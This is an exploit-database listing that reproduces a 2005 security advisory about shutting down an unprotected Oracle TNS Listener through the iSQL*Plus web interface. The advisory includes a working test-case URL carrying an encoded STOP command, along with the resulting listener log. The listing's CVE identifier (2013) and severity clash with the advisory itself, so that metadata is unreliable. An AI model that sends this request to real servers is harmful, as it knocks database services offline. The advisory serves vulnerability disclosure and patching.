Exploitalert - Database of Exploits

Shutdown TNS Listener via Oracle iSQL*Plus

CVE	Category	Price	Severity
CVE-2013-2618	CWE-20	$5000	High

Author	Risk	Exploitation Type	Date
Unknown	High	Remote	2005-10-26

CPE
cpe:cpe:/a:oracle:isql_plus

CVSS	EPSS	EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H	0.79	0.89

CVSS vector description

Metric	Value	Metric Description	Value Description
Attack vector	Network	AV	The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity	Low	AC	The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required	None	PR	The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
User Interaction	None	UI	The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope	Unchanged	S	An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality	None	C	There is no impact on the confidentiality of the system; the attacker does not gain the ability to read any data.
Integrity	None	I	There is no impact on the integrity of the system; the attacker does not gain the ability to modify any files or information on the target system.
Availability	High	A	There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.

http://cxsecurity.com/ascii/WLB-2005100024

Shutdown TNS Listener via Oracle iSQL*Plus ########################################## Name Shutdown TNS Listener via Oracle iSQL*Plus Systems Affected Oracle Database 9i Rel. 2 Severity Medium Risk Category Denial of Service Vendor URL http://www.oracle.com This advisory http://www.red-database-security.com/advisory/oracle_isqlplus_shutdown.h tml Author Alexander Kornbrust (ak at red-database-security.com) Date 7 October 2005 (V 1.00) Details ####### Oracle iSQL*Plus is a web interface to SQL*Plus. The web interface can be used to stop the (unprotected) TNS Listener. Affected Products ################# Oracle Database 9i Release 2 Testcase ######## http://server:3339/isqlplus?username=s&password=s&sid=%28DESCRIPTION%3D% 28ADDRESS_LIST%3D%28ADDRESS%3D%28PROTOCOL%3DTCP%29%28HOST%3Dlocalhost%29 %28PORT%3D1521%29%29%29%28CONNECT_DATA%3D%28COMMAND%3DSTOP%29%28SERVICE% 3DLISTENER%29%28USER%3DHacker%29%29%29&login=Login&action=logon ==> ERROR: ORA-12564: TNS:connection refused Excerpt from the listener.log: 28-OCT-2003 15:14:39 * (CONNECT_DATA=(COMMAND=STOP)(SERVICE=LISTENER)(USER=Hacker)(CID=(PROGRAM =c:oracleora92binisqlplus)(HOST=LOCALHOST)(USER=SYSTEM))) * stop * 0 Affected systems ################ Tested with Oracle Database 9.0.2.4. Patch Information ################# This bug is fixed with Critical Patch Update July 2005 (CPU July 2005). Oracle forgot to inform Red-Database-Security that this bug is fixed with CPU July 2005. All already published alerts are available on the web site of Red-Database-Security GmbH http://www.red-database-security.com/advisory/published_alerts.html History ####### 28-oct-2003 Oracle secalert was informed 29-oct-2003 Bug confirmed 12-jul-2005 Oracle published CPU July 2005 without informing Red-Database-Security that this bug is already fixed. 07-oct-2005 Red-Database-Security published this advisory © 2005 by Red-Database-Security GmbH - last update 7-october-2005

Impressum